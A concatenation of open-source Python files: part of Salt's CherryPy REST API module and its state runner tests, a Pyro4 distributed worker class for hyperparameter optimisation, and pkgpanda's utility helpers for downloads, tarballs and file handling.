- kwarg:
pillar:
revision: {{ build.revision }}
{% endif %}
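The hook in this example can also be fired from Python; a minimal sketch
using the ``requests`` library (URL, header, and payload mirror the event
shown above and are illustrative):
.. code-block:: python
    import requests
    requests.post(
        'http://localhost:8000/hook/mycompany/build/success',
        headers={'X-My-Secret-Key': 'F0fAgoQjIT@W'},
        json={'revision': 'aa22a3c4b2e7', 'result': True})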
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
raw_body = cherrypy.serving.request.raw_body
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http:get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in self.url_map.items():
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.cors_tool.on': True,
},
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
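# A rough sketch of how the pieces above are typically wired together when
# serving the API (``opts`` would come from the Salt master config loader;
# this is illustrative, not the exact startup code):
#
#     import cherrypy
#     root, apiopts, cpyopts = get_app(opts)
#     cherrypy.quickstart(root, '/', cpyopts)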
|
test_state.py
|
# -*- coding: utf-8 -*-
'''
Tests for the state runner
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import errno
import os
import shutil
import signal
import tempfile
import textwrap
import threading
from salt.ext.six.moves import queue
# Import Salt Testing Libs
from tests.support.case import ShellCase
from tests.support.unit import skipIf
from tests.support.paths import TMP
from tests.support.helpers import flaky
# Import Salt Libs
import salt.utils.platform
import salt.utils.event
import salt.utils.files
import salt.utils.json
import salt.utils.stringutils
import salt.utils.yaml
# Import 3rd-party libs
from salt.ext import six
class StateRunnerTest(ShellCase):
'''
Test the state runner.
'''
def add_to_queue(self, q, cmd):
'''
helper method to add salt-run
return data to a queue
'''
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
@flaky
def test_orchestrate_output(self):
'''
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
and not the full stateful return. This test ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
'''
#ret_output = self.run_run_plus('state.orchestrate', 'orch.simple')['out']
ret_output = self.run_run('state.orchestrate orch.simple')
bad_out = ['outputter:', ' highstate']
good_out = [' Function: salt.state',
' Result: True',
'Succeeded: 1 (changed=1)',
'Failed: 0',
'Total states run: 1']
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
self.assertNotEqual(bad_out, ret_output)
# Now test that some expected good sample output is present in the return.
for item in good_out:
self.assertIn(item, ret_output)
def test_orchestrate_nested(self):
'''
test salt-run state.orchestrate and failhard with nested orchestration
'''
if os.path.exists('/tmp/ewu-2016-12-13'):
os.remove('/tmp/ewu-2016-12-13')
_, code = self.run_run(
'state.orchestrate nested-orch.outer',
with_retcode=True)
self.assertFalse(os.path.exists('/tmp/ewu-2016-12-13'))
self.assertNotEqual(code, 0)
def test_orchestrate_state_and_function_failure(self):
'''
Ensure that returns from failed minions are in the changes dict where
they belong, so they can be programmatically analyzed.
See https://github.com/saltstack/salt/issues/43204
'''
self.run_run('saltutil.sync_modules')
ret = salt.utils.json.loads(
'\n'.join(
self.run_run('state.orchestrate orch.issue43204 --out=json')
)
)
# Drill down to the changes dict
state_ret = ret['data']['master']['salt_|-Step01_|-Step01_|-state']['changes']
func_ret = ret['data']['master']['salt_|-Step02_|-runtests_helpers.nonzero_retcode_return_false_|-function']['changes']
# Remove duration and start time from the results, since they would
# vary with each run and that would make it impossible to test.
for item in ('duration', 'start_time'):
state_ret['ret']['minion']['test_|-test fail with changes_|-test fail with changes_|-fail_with_changes'].pop(item)
self.assertEqual(
state_ret,
{
'out': 'highstate',
'ret': {
'minion': {
'test_|-test fail with changes_|-test fail with changes_|-fail_with_changes': {
'__id__': 'test fail with changes',
'__run_num__': 0,
'__sls__': 'orch.issue43204.fail_with_changes',
'changes': {
'testing': {
'new': 'Something pretended to change',
'old': 'Unchanged'
}
},
'comment': 'Failure!',
'name': 'test fail with changes',
'result': False,
}
}
}
}
)
self.assertEqual(
func_ret,
{'out': 'highstate', 'ret': {'minion': False}}
)
def test_orchestrate_target_exists(self):
'''
test orchestration when target exists
while using multiple states
'''
ret = self.run_run('state.orchestrate orch.target-exists')
first = [' ID: core',
' Function: salt.state',
' Result: True']
second = [' ID: test-state',
' Function: salt.state',
' Result: True']
third = [' ID: cmd.run',
' Function: salt.function',
' Result: True']
ret_out = [first, second, third]
for out in ret_out:
for item in out:
self.assertIn(item, ret)
def test_orchestrate_retcode(self):
'''
Test orchestration with nonzero retcode set in __context__
'''
self.run_run('saltutil.sync_runners')
self.run_run('saltutil.sync_wheel')
ret = '\n'.join(self.run_run('state.orchestrate orch.retcode', timeout=120))
for result in (' ID: test_runner_success\n'
' Function: salt.runner\n'
' Name: runtests_helpers.success\n'
' Result: True',
' ID: test_runner_failure\n'
' Function: salt.runner\n'
' Name: runtests_helpers.failure\n'
' Result: False',
' ID: test_wheel_success\n'
' Function: salt.wheel\n'
' Name: runtests_helpers.success\n'
' Result: True',
' ID: test_wheel_failure\n'
' Function: salt.wheel\n'
' Name: runtests_helpers.failure\n'
' Result: False'):
self.assertIn(result, ret)
def test_orchestrate_target_doesnt_exists(self):
'''
test orchestration when the target doesn't exist
while using multiple states
'''
ret = self.run_run('state.orchestrate orch.target-doesnt-exists')
first = ['No minions matched the target. No command was sent, no jid was assigned.',
' ID: core',
' Function: salt.state',
' Result: False']
second = [' ID: test-state',
' Function: salt.state',
' Result: True']
third = [' ID: cmd.run',
' Function: salt.function',
' Result: True']
ret_out = [first, second, third]
for out in ret_out:
for item in out:
self.assertIn(item, ret)
def test_state_event(self):
'''
test to ensure state.event
runner returns correct data
'''
q = queue.Queue(maxsize=0)
cmd = 'state.event salt/job/*/new count=1'
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt('minion test.ping --static')
out = q.get()
self.assertIn(expect, six.text_type(out))
server_thread.join()
@skipIf(salt.utils.platform.is_windows(), '*NIX-only test')
class OrchEventTest(ShellCase):
'''
Tests for orchestration events
'''
def setUp(self):
self.timeout = 60
self.master_d_dir = os.path.join(self.get_config_dir(), 'master.d')
try:
os.makedirs(self.master_d_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
self.conf = tempfile.NamedTemporaryFile(
mode='w',
suffix='.conf',
dir=self.master_d_dir,
delete=True,
)
self.base_env = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, self.base_env)
self.addCleanup(self.conf.close)
for attr in ('timeout', 'master_d_dir', 'conf', 'base_env'):
self.addCleanup(delattr, self, attr)
# Force a reload of the configuration now that our temp config file has
# been removed.
self.addCleanup(self.run_run_plus, 'test.arg', __reload_config=True)
def alarm_handler(self, signal, frame):
raise Exception('Timeout of {0} seconds reached'.format(self.timeout))
def write_conf(self, data):
'''
Dump the config dict to the conf file
'''
self.conf.write(salt.utils.yaml.safe_dump(data, default_flow_style=False))
self.conf.flush()
def test_jid_in_ret_event(self):
'''
Test to confirm that the ret event for the orchestration contains the
jid for the jobs spawned.
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
state_sls = os.path.join(self.base_env, 'test_state.sls')
with salt.utils.files.fopen(state_sls, 'w') as fp_:
fp_.write(salt.utils.stringutils.to_str(textwrap.dedent('''
date:
cmd.run
''')))
orch_sls = os.path.join(self.base_env, 'test_orch.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(salt.utils.stringutils.to_str(textwrap.dedent('''
date_cmd:
salt.state:
- tgt: minion
- sls: test_state
ping_minion:
salt.function:
- name: test.ping
- tgt: minion
fileserver.file_list:
salt.runner
config.values:
salt.wheel
''')))
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
jid = self.run_run_plus(
'state.orchestrate',
'test_orch',
__reload_config=True).get('jid')
if jid is None:
raise Exception('jid missing from run_run_plus output')
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event['tag'] == 'salt/run/{0}/ret'.format(jid):
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event['data']['return']['data']['master']
for job in ret:
self.assertTrue('__jid__' in ret[job])
break
finally:
del listener
signal.alarm(0)
|
worker.py
|
import multiprocessing
import os
import pickle
import socket
import sys
import threading
import time
import traceback
from uuid import uuid4
import Pyro4
from autoflow.utils.logging_ import get_logger
from autoflow.utils.sys_ import get_trance_back_msg
class Worker(object):
"""
The worker is responsible for evaluating a single configuration on a single budget at a time.
Communication to the individual workers goes via the nameserver, management of the worker-pool and job
scheduling is done by the Dispatcher and jobs are determined by the Master. In distributed systems, each
cluster-node runs a Worker-instance. To implement your own worker, override the `__init__` and `compute` methods.
The first allows one to perform initial computations, e.g. loading the dataset, when the worker is started, while the
latter is repeatedly called during the optimization and evaluates a given configuration yielding the associated loss.
"""
def __init__(
self,
run_id,
nameserver=None,
nameserver_port=None,
host=None,
worker_id=None,
timeout=None,
debug=False
):
"""
Parameters
----------
run_id: anything with a __str__ method
unique id to identify individual HpBandSter run
nameserver: str
hostname or IP of the nameserver
nameserver_port: int
port of the nameserver
debug: bool
if True, exceptions raised inside `compute` are re-raised instead of only being reported back as a failed result
host: str
hostname for this worker process
worker_id: anything with a __str__ method
if multiple workers are started in the same process, you MUST provide a unique id for each one of them using the `worker_id` argument.
timeout: int or float or None
specifies the time a worker will wait for a new job after finishing a computation before shutting down.
Towards the end of a long run with multiple workers, this helps to shutdown idling workers. We recommend
a timeout that is roughly half the time it would take for the second largest budget to finish.
The default (None) means that the worker will wait indefinitely and never shutdown on its own.
"""
self.debug = debug
self.run_id = run_id
self.host = host
self.nameserver = nameserver
self.nameserver_port = nameserver_port
self.worker_id = "opt.run_%s.worker.%s.%i" % (self.run_id, socket.gethostname(), os.getpid())
self.manifest_id = uuid4().hex[-8:]
self.timeout = timeout
self.timer = None
if worker_id is not None:
worker_id = str(worker_id)
self.worker_id += f".{worker_id}"
self.manifest_id = worker_id
self.thread = None
self.logger = get_logger(f"Worker[{self.manifest_id}]")  # naming concern in distributed environments
self.busy = False
self.thread_cond = threading.Condition(threading.Lock())
def load_nameserver_credentials(self, working_directory, num_tries=60, interval=1):
"""
loads the nameserver credentials in cases where master and workers share a filesystem
Parameters
----------
working_directory: str
the working directory for the HPB run (see master)
num_tries: int
number of attempts to find the file (default 60)
interval: float
waiting period between the attempts
"""
fn = os.path.join(working_directory, 'HPB_run_%s_pyro.pkl' % self.run_id)
for i in range(num_tries):
try:
with open(fn, 'rb') as fh:
self.nameserver, self.nameserver_port = pickle.load(fh)
return
except FileNotFoundError:
self.logger.warning('config file %s not found (try %i/%i)' % (fn, i + 1, num_tries))
time.sleep(interval)
except:
raise
raise RuntimeError("Could not find the nameserver information, aborting!")
def run(self, background=False, concurrent_type="process"):
"""
Method to start the worker.
Parameters
----------
background: bool
If set to False (default), the worker is executed in the current thread.
If True, a new daemon process or thread (depending on ``concurrent_type``)
is created that runs the worker. This is useful in a single worker
scenario/when the compute function only simulates work.
concurrent_type: str
either "process" (default) or "thread"; selects how the background worker is executed.
"""
if background:
if concurrent_type == "process":
self.process = multiprocessing.Process(target=self._run, name='worker %s process' % self.worker_id)
self.process.daemon = True
self.process.start()
elif concurrent_type == "thread":
# several workers may share one process; make the id unique per thread
self.worker_id += f"_{threading.get_ident()}"
self.thread = threading.Thread(target=self._run, name='worker %s thread' % self.worker_id)
self.thread.daemon = True
self.thread.start()
else:
self._run()
def _run(self):
# initial ping to the dispatcher to register the worker
try:
with Pyro4.locateNS(host=self.nameserver, port=self.nameserver_port) as ns:
self.logger.debug('WORKER: Connected to nameserver %s' % (str(ns)))
dispatchers = ns.list(prefix="opt.run_%s.dispatcher" % self.run_id)
except Pyro4.errors.NamingError:
if self.thread is None:
raise RuntimeError(
'No nameserver found. Make sure the nameserver is running and that the host (%s) and port (%s) are correct' % (
self.nameserver, self.nameserver_port))
else:
self.logger.error(
'No nameserver found. Make sure the nameserver is running and that the host (%s) and port (%s) are correct' % (
self.nameserver, self.nameserver_port))
exit(1)
except:
raise
for dn, uri in dispatchers.items():
try:
self.logger.debug('WORKER: found dispatcher %s' % dn)
with Pyro4.Proxy(uri) as dispatcher_proxy:
dispatcher_proxy.trigger_discover_worker()
except Pyro4.errors.CommunicationError:
self.logger.debug('WORKER: Dispatcher did not respond. Waiting for one to initiate contact.')
pass
except:
raise
if len(dispatchers) == 0:
self.logger.debug('WORKER: No dispatcher found. Waiting for one to initiate contact.')
self.logger.info(f"WORKER(worker_id='{self.worker_id}'): start listening for jobs")
self.pyro_daemon = Pyro4.core.Daemon(host=self.host)
with Pyro4.locateNS(self.nameserver, port=self.nameserver_port) as ns:
uri = self.pyro_daemon.register(self, self.worker_id)
ns.register(self.worker_id, uri)
self.pyro_daemon.requestLoop()
with Pyro4.locateNS(self.nameserver, port=self.nameserver_port) as ns:
ns.remove(self.worker_id)
def compute(self, config_id, config, config_info, budget, working_directory):
""" The function you have to overload implementing your computation.
Parameters
----------
config_id: tuple
a triplet of ints that uniquely identifies a configuration. The convention is
id = (iteration, budget index, running index) with the following meaning:
- iteration: the iteration of the optimization algorithms. E.g., for Hyperband that is one round of Successive Halving
- budget index: the budget (of the current iteration) for which this configuration was sampled by the optimizer. This is only nonzero if the majority of the runs fail and Hyperband resamples to fill empty slots, or you use a more 'advanced' optimizer.
- running index: this is simply an int >= 0 that sorts the configs into the order they were sampled, i.e. (x,x,0) was sampled before (x,x,1).
config: dict
the actual configuration to be evaluated.
budget: float
the budget for the evaluation
working_directory: str
a name of a directory that is unique to this configuration. Use this to store intermediate results on lower budgets that can be reused later for a larger budget (for iterative algorithms, for example).
Returns
-------
dict:
needs to return a dictionary with two mandatory entries:
- 'loss': a numerical value that is MINIMIZED
- 'info': This can be pretty much any built-in Python type, e.g. a dict with lists as value. Due to Pyro4 handling the remote function calls, 3rd party types like numpy arrays are not supported!
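Example
-------
A minimal sketch of a subclass (the objective below is purely illustrative)::
    class MyWorker(Worker):
        def compute(self, config_id, config, config_info, budget, working_directory):
            # toy objective: the optimizer minimizes 'loss'
            loss = sum(v * v for v in config.values() if isinstance(v, (int, float)))
            return {'loss': loss, 'info': {'budget': budget}}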
"""
raise NotImplementedError(
"Subclass opt.distributed.worker and overwrite the compute method in your worker script")
@Pyro4.expose
@Pyro4.oneway
def start_computation(self, callback, config_id, *args, **kwargs):
with self.thread_cond:
while self.busy:
self.thread_cond.wait()
self.busy = True
if self.timeout is not None and self.timer is not None:
self.timer.cancel()
self.logger.info('WORKER: start processing job %s' % str(config_id))
self.logger.debug('WORKER: args: %s' % (str(args)))
self.logger.debug('WORKER: kwargs: %s' % (str(kwargs)))
try:
result = {'result': self.compute(*args, config_id=config_id, **kwargs),
'exception': None}
except Exception as e:
self.logger.error(str(e))
self.logger.error(kwargs)
failed_info = get_trance_back_msg()
if self.debug:
self.logger.error("re-raise exception")
raise
result = {'result': None,
'exception': failed_info}
finally:
self.logger.debug('WORKER: done with job %s, trying to register it.' % str(config_id))
with self.thread_cond:
self.busy = False
callback.register_result(config_id, result)
self.thread_cond.notify()
self.logger.info('WORKER: registered result for job %s with dispatcher' % str(config_id))
if self.timeout is not None:
self.timer = threading.Timer(self.timeout, self.shutdown)
self.timer.daemon = True
self.timer.start()
return (result)
@Pyro4.expose
def is_busy(self):
return (self.busy)
@Pyro4.expose
@Pyro4.oneway
def shutdown(self):
self.logger.debug('WORKER: shutting down now!')
self.pyro_daemon.shutdown()
if self.thread is not None:
self.thread.join()
|
util.py
|
import hashlib
import http.server
import json
import logging
import os
import platform
import re
import shutil
import socketserver
import stat
import tarfile
import tempfile
from contextlib import contextmanager, ExitStack
from itertools import chain
from multiprocessing import Process
from shutil import rmtree
from typing import List
import requests
import retrying
import teamcity
import yaml
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
from teamcity.messages import TeamcityServiceMessages
from pkgpanda import subprocess
from pkgpanda.exceptions import FetchError, IncompleteDownloadError, ValidationError
log = logging.getLogger(__name__)
is_windows = platform.system() == "Windows"
def is_absolute_path(path):
if is_windows:
# We assume one char drive letter. Sometimes it's two, but not often.
# pattern is <driveletter>:/string....
if path[1] == ':':
return True
else:
if path[0] == '/':
return True
return False
def remove_file(path):
"""removes a file. fails silently if the file does not exist"""
if is_windows:
# python library on Windows does not like symbolic links in directories
# so calling out to the cmd prompt to do this fixes that.
path = path.replace('/', '\\')
if os.path.exists(path):
subprocess.call(['cmd.exe', '/c', 'del', '/q', path])
else:
subprocess.check_call(['rm', '-f', path])
def remove_directory(path):
"""recursively removes a directory tree. fails silently if the tree does not exist"""
if is_windows:
# python library on Windows does not like symbolic links in directories
# so calling out to the cmd prompt to do this fixes that.
path = path.replace('/', '\\')
if os.path.exists(path):
subprocess.call(['cmd.exe', '/c', 'rmdir', '/s', '/q', path])
else:
subprocess.check_call(['rm', '-rf', path])
def make_directory(path):
"""Create a directory, creating intermediate directories if necessary"""
if is_windows:
path = path.replace('/', '\\')
if not os.path.exists(path):
os.makedirs(path)
def copy_file(src_path, dst_path):
"""copy a single directory item from one location to another"""
if is_windows:
# To make sure the copy works we are using cmd version as python
# libraries may not handle symbolic links and other things that are
# thrown at it.
src = src_path.replace('/', '\\')
dst = dst_path.replace('/', '\\')
subprocess.check_call(['cmd.exe', '/c', 'copy', src, dst])
else:
subprocess.check_call(['cp', src_path, dst_path])
def copy_directory(src_path, dst_path):
"""copy recursively a directory tree from one location to another"""
if is_windows:
# To make sure the copy works we are using cmd version as python
# libraries may not handle symbolic links and other things that are
# thrown at it.
src = src_path.replace('/', '\\')
dst = dst_path.replace('/', '\\')
subprocess.check_call(['cmd.exe', '/c', 'xcopy', src, dst, '/E', '/B', '/I'])
else:
subprocess.check_call(['cp', '-r', src_path, dst_path])
def variant_str(variant):
"""Return a string representation of variant."""
if variant is None:
return ''
return variant
def variant_object(variant_str):
"""Return a variant object from its string representation."""
if variant_str == '':
return None
return variant_str
def variant_name(variant):
"""Return a human-readable string representation of variant."""
if variant is None:
return '<default>'
return variant
def variant_prefix(variant):
"""Return a filename prefix for variant."""
if variant is None:
return ''
return variant + '.'
def variant_suffix(variant, delim='.'):
if variant is None:
return ''
return delim + variant
def get_requests_retry_session(max_retries=4, backoff_factor=1, status_forcelist=None):
status_forcelist = status_forcelist or [500, 502, 504]
# Default max retries 4 with sleeping between retries 1s, 2s, 4s, 8s
session = requests.Session()
custom_retry = Retry(total=max_retries,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist)
custom_adapter = HTTPAdapter(max_retries=custom_retry)
# Any request through this session that starts with 'http://' or 'https://'
# will use the custom Transport Adapter created which include retries
session.mount('http://', custom_adapter)
session.mount('https://', custom_adapter)
return session
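# Example usage (URL is illustrative): requests made through the returned
# session are retried on connection errors and on the 500/502/504 responses
# listed above, with exponential backoff between attempts.
#
#     session = get_requests_retry_session()
#     response = session.get('https://example.com/artifact.tar.xz', timeout=30)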
def _is_incomplete_download_error(exception):
return isinstance(exception, IncompleteDownloadError)
@retrying.retry(
stop_max_attempt_number=3,
wait_random_min=1000,
wait_random_max=2000,
retry_on_exception=_is_incomplete_download_error)
def _download_remote_file(out_filename, url):
with open(out_filename, "wb") as f:
r = get_requests_retry_session().get(url, stream=True)
r.raise_for_status()
total_bytes_read = 0
for chunk in r.iter_content(chunk_size=4096):
f.write(chunk)
total_bytes_read += len(chunk)
if 'content-length' in r.headers:
content_length = int(r.headers['content-length'])
if total_bytes_read != content_length:
raise IncompleteDownloadError(url, total_bytes_read, content_length)
return r
def download(out_filename, url, work_dir, rm_on_error=True):
assert os.path.isabs(out_filename)
assert os.path.isabs(work_dir)
work_dir = work_dir.rstrip('/')
# Strip off whitespace to make it so scheme matching doesn't fail because
# of simple user whitespace.
url = url.strip()
# Handle file:// urls specially since requests doesn't know about them.
try:
if url.startswith('file://'):
src_filename = url[len('file://'):]
if not os.path.isabs(src_filename):
src_filename = work_dir + '/' + src_filename
shutil.copyfile(src_filename, out_filename)
else:
_download_remote_file(out_filename, url)
except Exception as fetch_exception:
if rm_on_error:
rm_passed = False
# try / except so if remove fails we don't get an exception during an exception.
# Sets rm_passed to true so if this fails we can include a special error message in the
# FetchError
try:
os.remove(out_filename)
rm_passed = True
except Exception:
pass
else:
rm_passed = True
raise FetchError(url, out_filename, fetch_exception, rm_passed) from fetch_exception
def download_atomic(out_filename, url, work_dir):
assert os.path.isabs(out_filename)
tmp_filename = out_filename + '.tmp'
try:
download(tmp_filename, url, work_dir)
shutil.move(tmp_filename, out_filename)
except FetchError:
try:
os.remove(tmp_filename)
except:
pass
raise
def extract_tarball(path, target):
"""Extract the tarball into target.
If there are any errors, delete the folder being extracted to.
"""
# TODO(cmaloney): Validate extraction will pass before unpacking as much as possible.
# TODO(cmaloney): Unpack into a temporary directory then move into place to
# prevent partial extraction from ever laying around on the filesystem.
try:
assert os.path.exists(path), "Path doesn't exist but should: {}".format(path)
make_directory(target)
# TODO(tweidner): https://jira.mesosphere.com/browse/DCOS-48220
# Make this cross-platform via Python's tarfile module once
# https://bugs.python.org/issue21872 is fixed.
if is_windows:
subprocess.check_call(['bsdtar', '-xf', path, '-C', target])
else:
subprocess.check_call(['tar', '-xf', path, '-C', target])
except:
# If there are errors, we can't really cope since we are already in an error state.
rmtree(target, ignore_errors=True)
raise
def load_json(filename):
try:
with open(filename) as f:
return json.load(f)
except ValueError as ex:
raise ValueError("Invalid JSON in {0}: {1}".format(filename, ex)) from ex
class YamlParseError(Exception):
pass
def load_yaml(filename):
try:
with open(filename) as f:
return yaml.safe_load(f)
except yaml.YAMLError as ex:
raise YamlParseError("Invalid YAML in {}: {}".format(filename, ex)) from ex
def write_yaml(filename, data, **kwargs):
dumped_yaml = yaml.safe_dump(data, **kwargs)
write_string(filename, dumped_yaml)
def make_file(name):
with open(name, 'a'):
pass
def write_json(filename, data):
dumped_json = json_prettyprint(data=data)
write_string(filename, dumped_json)
def write_string(filename, data):
"""
Write a string to a file.
Overwrite any data in that file.
We use an atomic write practice of creating a temporary file and then
moving that temporary file to the given ``filename``. This prevents race
conditions such as the file being read by another process after it is
opened here but not yet written to.
It also prevents us from creating or truncating a file before we fail to
write data to it because of low disk space.
If no file already exists at ``filename``, the new file is created with
permissions 0o644.
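For example (path and contents are illustrative), a concurrent reader of the
target file observes either its previous contents or the full new contents,
never a partial write::
    write_string('/tmp/example.conf', 'key: value')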
"""
prefix = os.path.basename(filename)
tmp_file_dir = os.path.dirname(os.path.realpath(filename))
fd, temporary_filename = tempfile.mkstemp(prefix=prefix, dir=tmp_file_dir)
try:
permissions = os.stat(filename).st_mode
except FileNotFoundError:
log.debug("File %s does not exist, creating", filename)
permissions = 0o644
try:
try:
os.write(fd, data.encode())
finally:
os.close(fd)
os.chmod(temporary_filename, stat.S_IMODE(permissions))
os.replace(temporary_filename, filename)
except Exception:
os.remove(temporary_filename)
raise
def load_string(filename):
with open(filename) as f:
return f.read().strip()
def json_prettyprint(data):
return json.dumps(
data,
sort_keys=True,
indent=2,
separators=(',', ':'),
)
def if_exists(fn, *args, **kwargs):
try:
return fn(*args, **kwargs)
except FileNotFoundError as e:
log.debug(e)
return None
def sha1(filename):
hasher = hashlib.sha1()
with open(filename, 'rb') as fh:
while 1:
buf = fh.read(4096)
if not buf:
break
hasher.update(buf)
return hasher.hexdigest()
def expect_folder(path, files):
path_contents = os.listdir(path)
assert set(path_contents) == set(files)
def expect_fs(folder, contents):
if isinstance(contents, list):
expect_folder(folder, contents)
elif isinstance(contents, dict):
expect_folder(folder, contents.keys())
for path in iter(contents):
if contents[path] is not None:
expect_fs(os.path.join(folder, path), contents[path])
else:
raise ValueError("Invalid type {0} passed to expect_fs".format(type(contents)))
def _tar_filter(tar_info: tarfile.TarInfo) -> tarfile.TarInfo:
tar_info.uid = 0
tar_info.gid = 0
return tar_info
def make_tar(result_filename, change_folder):
tar_mode = ''
if is_windows:
tar_mode = 'w:gz'
else:
tar_mode = 'w:xz'
with tarfile.open(name=str(result_filename), mode=tar_mode) as tar:
tar.add(name=str(change_folder), arcname='./', filter=_tar_filter)
def rewrite_symlinks(root, old_prefix, new_prefix):
log.info("Rewrite symlinks in %s from %s to %s", root, old_prefix, new_prefix)
# Find the symlinks and rewrite them from old_prefix to new_prefix
# All symlinks not beginning with old_prefix are ignored because
# packages may contain arbitrary symlinks.
for root_dir, dirs, files in os.walk(root):
for name in chain(files, dirs):
full_path = os.path.join(root_dir, name)
if os.path.islink(full_path):
# Rewrite old_prefix to new_prefix if present.
target = os.readlink(full_path)
if target.startswith(old_prefix):
new_target = os.path.join(new_prefix, target[len(old_prefix) + 1:].lstrip('/'))
os.remove(full_path)
os.symlink(new_target, full_path)
def check_forbidden_services(path, services):
"""Check if package contains systemd services that may break DC/OS
This functions checks the contents of systemd's unit file dirs and
throws the exception if there are reserved services inside.
Args:
path: path where the package contents are
services: list of reserved services to look for
Raises:
ValidationError: Reserved service names were found inside the package
"""
services_dir_regexp = re.compile(r'dcos.target.wants(?:_.+)?')
forbidden_srv_set = set(services)
pkg_srv_set = set()
for direntry in os.listdir(path):
if not services_dir_regexp.match(direntry):
continue
pkg_srv_set.update(set(os.listdir(os.path.join(path, direntry))))
found_units = forbidden_srv_set.intersection(pkg_srv_set)
if found_units:
msg = "Reverved unit names found: " + ','.join(found_units)
raise ValidationError(msg)
def run(cmd, *args, **kwargs):
proc = subprocess.Popen(cmd, *args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs)
stdout, stderr = proc.communicate()
print("STDOUT: ", stdout.decode('utf-8'))
print("STDERR: ", stderr.decode('utf-8'))
if proc.returncode != 0:
raise subprocess.CalledProcessError(proc.returncode, cmd)
assert len(stderr) == 0
return stdout.decode('utf-8')
def launch_server(directory):
os.chdir("resources/repo")
httpd = socketserver.TCPServer(
("", 8000),
http.server.SimpleHTTPRequestHandler)
httpd.serve_forever()
class TestRepo:
def __init__(self, repo_dir):
self.__dir = repo_dir
def __enter__(self):
self.__server = Process(target=launch_server, args=(self.__dir,))
self.__server.start()
def __exit__(self, exc_type, exc_value, traceback):
self.__server.join()
def resources_test_dir(path):
assert not path.startswith('/')
return "pkgpanda/test_resources/{}".format(path)
class MessageLogger:
"""Abstraction over TeamCity Build Messages
When pkgpanda is run in a TeamCity environment additional meta-messages will be output to stdout
